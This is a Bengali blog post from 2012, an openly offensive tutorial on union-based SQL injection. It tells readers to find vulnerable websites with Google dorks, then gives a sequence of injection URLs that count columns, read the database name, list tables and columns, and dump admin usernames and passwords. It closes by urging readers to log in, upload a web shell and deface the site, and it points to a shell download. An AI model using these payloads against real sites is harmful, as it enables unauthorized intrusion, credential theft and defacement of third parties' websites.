Sunday, May 13, 2012

SQL Injection advance level

হ্যাকিং পদ্ধতি গুলোর মধ্যে সবচেয়ে কার্যকর পদ্ধতি হচ্ছে SQLi Injection.
এই পদ্ধতিতে হ্যাকিং এর জন্য প্রথমে dork ব্যবহার করে SQLi vulnerable সাইট খুঁজে বের করতে হবে।
SQLi এর Dork এখানে। আপনি যেকোনো dork ব্যবহার করতে পারেন, আপনার পছন্দ মতো।
ধরুন আমরা index.php?id= এই Dork  টি নিলাম।
এখন www.google.com এ গিয়ে উপরের Dork টি লিখে সার্চ দিলে নিচের মত ফলাফল আসবে।
সার্চ ফলাফল থেকে যেকোনো একটি সাইট নিয়ে তা পরীক্ষা করবো যে তা SQLi vulnerable কিনা।
মনেকরি, www.example.com/index.php?id=xx এই সাইট টি নিলাম।
এখন সাইটটির । vulnerabilities পরীক্ষার জন্য xx এর আগে অথবা পরে  Sign টি দিয়ে ওকে করলে যদি নিচের ছবির মত আসে তাহলে বুঝতে হবে সাইটটি এই পদ্ধতিতে Vvulnerable ।

কলাম সংখ্যা বের করতে লিখব  ঃ
www.myexample.com/index.php?id=-1+union+select+1
এখন যদি 1 ওয়েবপেজে দেখা যায় তাহলে বুঝতে হবে কলাম সংখ্যা 1 এবং 1 ই Vulnerable কলাম ।
যদি না হয় তাহলে পরবর্তী সংখ্যা 2 দিয়ে চেষ্টা করব এভাবে
www.myexample.com/index.php?id=-1+union+select+1,2
এবার যদি ওয়েবপেজে 1 ও 2 এর মধ্যের কোন দেখা যায় তাহলে কলাম সংখ্যা 2 এবং যে সংখ্যাটি দেখা যাবে সেটিই Vulnerable কলাম । ( একাধিক সংখ্যাও আসতে পারে , এক্ষেত্রে যে সংখ্যাটি উপরের দিকে থাকবে সেটি নিবো । )
Vulnerable কলাম না পাওয়া প্রজন্ত এভাবে চালিয়ে যেতে হবে ।
ধরি এখানে কলাম সংখ্যা  4 এবং Vulnerable কলাম 3 ।
এখন Database নাম বের করতে লিখব
www.myexample.com/index.php?id=-1+union+select+1,2,@@database,4
অর্থাৎ যেটি Vulnerable কলাম সেটিকে শুধু @@database দিয়ে Replace করব ।
এখন ওয়েবপেজের যেখানে Vulnerable কলামটি দেখা গেসিল সেখানে Database নাম দেখাবে ।
এবার টেবিল নাম বের করব
www.myexample.com/index.php?id=-1+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()
লক্ষ্য করুন এখানে @@database কে group_concat(table_name) দিয়ে Replace করা হয়েছে এবং 4 এর শেষে +from+information_schema.tables+where+table_schema=database() যোগ করা হয়েছে ।
এতে ওয়েবপেজে টেবিল নাম গুলো দেখা যাবে ।
এখন কলাম নাম বের করতে table_name কে column_name এবং tables কে columns দিয়ে Replace করব , তাহলে লাইনটি হবে
www.myexample.com/index.php?id=-1+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_schema=database()
কলাম নাম গুলো ওয়েবপেজে দেখা যাবে ।
এবার username & password বের করতে লিখব
www.myexample.com/index.php?id=-1+union+select+1,2,(যে কলামে username থাকতে পারে তার নাম,0x3a,যে কলামে password থাকতে পারে তার নাম,0x3a)+from+যে টেবিলে এডমিন ইনফো থাকতে পারে তার নাম
** ধরি এখানে এডমিন ইনফো আছে admin টেবিলে এবং username ও password আছে user এবং pass নামের কলামে । তাহলে মূল লাইনটি হবে
www.myexample.com/index.php?id=-1+union+select+1,2,(user,0x3a,pass,0x3a),4+from+admin
ওয়েবপেজে দেখা যাবে username এবং password ।
কাজ শেষ । এবার এডমিন প্যানেল বের করে username এবং password দিয়ে লগিন করে shell upload করে deface দিন ।
Shell download করুন এখান থেকে

0 comments:

Post a Comment